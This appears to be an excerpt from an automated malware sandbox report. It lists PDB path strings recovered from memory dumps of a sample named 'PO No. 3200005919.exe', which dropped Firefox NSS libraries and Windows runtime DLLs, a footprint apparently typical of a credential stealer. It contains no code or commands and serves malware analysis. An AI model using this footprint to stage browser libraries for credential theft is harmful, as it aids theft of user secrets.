Source:	Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.dr
Source:	Binary string: ucrtbase.pdb source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7186840993.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7189033393.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.5.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192477101.000000001E5F8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192708827.000000001E600000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192605806.000000001E5FC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7139684497.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.5.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7193344870.000000001E61C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193449641.000000001E620000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7145957838.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193561822.000000001E624000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193218179.000000001E618000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.5.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.5.dr
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7155669494.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196318925.000000001E658000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7154557567.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7196731869.000000001E670000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7159539905.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196892223.000000001E674000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197003158.000000001E678000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7164222655.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7165324032.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7144272032.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196318925.000000001E658000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196442274.000000001E65C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7156953736.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196550840.000000001E660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7153506909.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7152463127.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.5.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: PO No. 3200005919.exe, 00000005.00000003.7191720901.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7216382572.000000001DC98000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.5.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7196731869.000000001E670000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196892223.000000001E674000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.5.dr
Source:	Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.5.dr
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192477101.000000001E5F8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7138655949.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7150187588.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.5.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.5.dr
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000002.7280858464.000000001E270000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192477101.000000001E5F8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192605806.000000001E5FC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7139597928.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7138655949.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7139684497.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7197668078.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7162881339.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197360510.000000001E698000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7163552141.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7196731869.000000001E670000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7157618680.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7158930983.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7158247147.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7158985607.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.5.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.dr
Source:	Binary string: qipcap.pdb source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.dr
Source:	Binary string: msvcp140.i386.pdb source: PO No. 3200005919.exe, 00000005.00000003.7207591372.000000001D9A8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7174962411.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7174178046.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.5.dr
Source:	Binary string: ucrtbase.pdbUGP source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7186840993.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7189033393.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.5.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7151568728.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.5.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.5.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7153506909.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7154557567.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.5.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7137545133.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7157618680.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196659326.000000001E664000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196318925.000000001E658000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196442274.000000001E65C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7156953736.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196550840.000000001E660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7161475490.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7161350303.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197174638.000000001E688000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197291781.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7193344870.000000001E61C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193449641.000000001E620000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7145957838.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7145338066.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193218179.000000001E618000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.5.dr
